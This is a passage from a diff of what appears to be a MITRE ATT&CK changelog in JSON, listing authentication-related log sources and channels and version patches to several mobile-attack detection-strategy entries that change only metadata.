+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Failed and successful logins to network devices outside approved admin IP ranges"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Privileged login followed by destructive format command"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "admin login events"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Privileged login followed by destructive command sequence"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "AAA, RADIUS, or TACACS authentication"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "authentication logs"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "AAA or TACACS authentication failures"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "authentication & authorization"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "login failed"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Accepted password or publickey for user from remote IP"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Repeated failed authentication attempts or replay patterns"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Successful login without expected MFA challenge"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "sshd or PAM logins"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TGS-REQ and AS-REQ seen for new user shortly after domain-modifying process"
+                        },
+                        {
+                            "name": "Okta:authn",
+                            "channel": "authentication_failure"
+                        },
+                        {
+                            "name": "Okta:SystemLog",
+                            "channel": "eventType: user.authentication.sso, app.oauth2.token.grant"
+                        },
+                        {
+                            "name": "saas-app:auth",
+                            "channel": "login_failure"
+                        },
+                        {
+                            "name": "saas:audit",
+                            "channel": "Repeated requests to SMS-generating endpoints using anomalous or new user agents, IP ranges, or geographies."
+                        },
+                        {
+                            "name": "saas:auth",
+                            "channel": "signin_failed"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "API access without user login"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "Accessed third-party credential management service"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "login with reused session token and mismatched user agent or IP"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "Access via OAuth credentials with unusual scopes or from anomalous IPs"
+                        },
+                        {
+                            "name": "saas:MDM",
+                            "channel": "Authentication events to device management or enterprise mobility management consoles"
+                        },
+                        {
+                            "name": "saas:MDM",
+                            "channel": "Authentication events to Apple iCloud or enterprise device management services"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "session.impersonation.start"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "Unusual OAuth app requesting message-read scopes for Slack/Teams/Jira"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "authentication_failure"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "Sign-in logs / audit events"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "user.account.reset_password; user.mfa.factor.activate; app.oauth2.authorize"
+                        },
+                        {
+                            "name": "saas:salesforce",
+                            "channel": "API login using access_token without login history"
+                        },
+                        {
+                            "name": "saas:salesforce",
+                            "channel": "Login"
+                        },
+                        {
+                            "name": "User Account",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4625"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4769, 1200, 1202"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4768, 4769, 4770"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4769"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4776, 4625"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4625, 4771, 4648"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4648"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.777000+00:00\", \"old_value\": \"2026-04-24 19:47:33.610000+00:00\"}}}",
+                    "previous_version": "3.0"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "detectionstrategies": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0c7e55b4-57b2-4a0f-ba0e-f50eab1a95f0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0697",
+                            "external_id": "DET0697"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Abuse Accessibility Features",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7d2231b0-d62e-4d5f-bc26-99e7f14ec741"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9bfe6e65-c691-44fa-9d00-bf7fd5e6479f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0642",
+                            "external_id": "DET0642"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Abuse Elevation Control Mechanism",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--31542445-39c5-4ae9-806f-09649581056a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--84e15e6c-ddc1-40a0-8e46-ba5605b6345b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0611",
+                            "external_id": "DET0611"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Access Notifications",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--462f9ed4-5b6b-4426-b383-cd331f2984c0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--78eb87ae-c606-41cc-b133-b02eb35fb54d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0605",
+                            "external_id": "DET0605"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Account Access Removal",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dd7242e8-12d5-46b4-bc2c-cff6c2dbaa27"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--98f14414-883e-4da3-930a-19a8faa1be41",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0635",
+                            "external_id": "DET0635"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6bd50b74-5852-4800-b459-1c54d95348e3",
+                        "x-mitre-analytic--cbb3d486-b7a3-44f0-a7c7-e2fbf668f6fa"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7a96a921-48bc-4fcf-b6b8-86a96315d4ee",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0623",
+                            "external_id": "DET0623"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Adversary-in-the-Middle",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--384bbe3f-bb48-4bf3-927e-3a95d13eae82",
+                        "x-mitre-analytic--36ca4ab8-1a16-4989-89e6-8d20c514c8c7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a6da6dc3-19fe-4d1c-ab77-843c08377a19",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0685",
+                            "external_id": "DET0685"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Application Layer Protocol",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d11da2b2-1552-4a54-b268-3df1cb877cf6",
+                        "x-mitre-analytic--9396ec3f-2189-44d1-9c88-53ee3603236c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--debfadd8-1df0-43b1-ae16-5f893dfc8bf3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0652",
+                            "external_id": "DET0652"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Application Versioning",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3fe80400-0e8c-4ffa-8233-cebf7511613c",
+                        "x-mitre-analytic--095c16b2-3d9a-445a-82a4-fa7affd928f5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b66555c6-297c-4769-affe-8f268b7c3c78",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0670",
+                            "external_id": "DET0670"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Archive Collected Data",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--bfa12b75-13ab-409f-8fe9-a93c8bcac466",
+                        "x-mitre-analytic--1e72355d-3350-4b60-8c92-2ded50a3fdd1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bce77859-548a-4ee7-8002-a05b182bb5ae",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0667",
+                            "external_id": "DET0667"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Asymmetric Cryptography",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1f3c9114-ac86-4c1f-bb64-fb94d65ac78c",
+                        "x-mitre-analytic--4b4a369c-35aa-4389-a218-2034fb043041"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3e6673dc-e2c7-440e-b632-d25e3e9f92cc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0673",
+                            "external_id": "DET0673"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Audio Capture",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d942e493-32eb-4302-890b-7729f63b7202",
+                        "x-mitre-analytic--4623e949-e902-4a8c-893b-73e5ab4b57d5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1da26733-88c3-4cc8-8758-e2d65934f713",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0700",
+                            "external_id": "DET0700"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Bidirectional Communication",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1f1d8e33-293a-4ceb-a91c-0cf71c6805ea",
+                        "x-mitre-analytic--c08bd552-98fd-446d-b848-3c43b3b766f1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0677c510-fa4d-4a39-a14b-b91f9cde1e23",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0654",
+                            "external_id": "DET0654"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Boot or Logon Initialization Scripts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e8bfbaf2-cfa8-41fd-a5ee-48b57026ac7c",
+                        "x-mitre-analytic--007a370c-be77-49c9-9ca3-25d50de35864"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9c2fc530-8c91-458d-bb4e-6ec921ee2b85",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0711",
+                            "external_id": "DET0711"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Broadcast Receivers",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fbc0a210-8942-4fcb-81f1-a120551013d4"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0cb492cd-7d01-46b2-b1f4-afddec10eaf2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0674",
+                            "external_id": "DET0674"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Calendar Entries",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--38e2eb61-e650-4cdc-8f27-213b39499d34",
+                        "x-mitre-analytic--abfa1de9-fcf5-44da-a910-f83273b60813"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
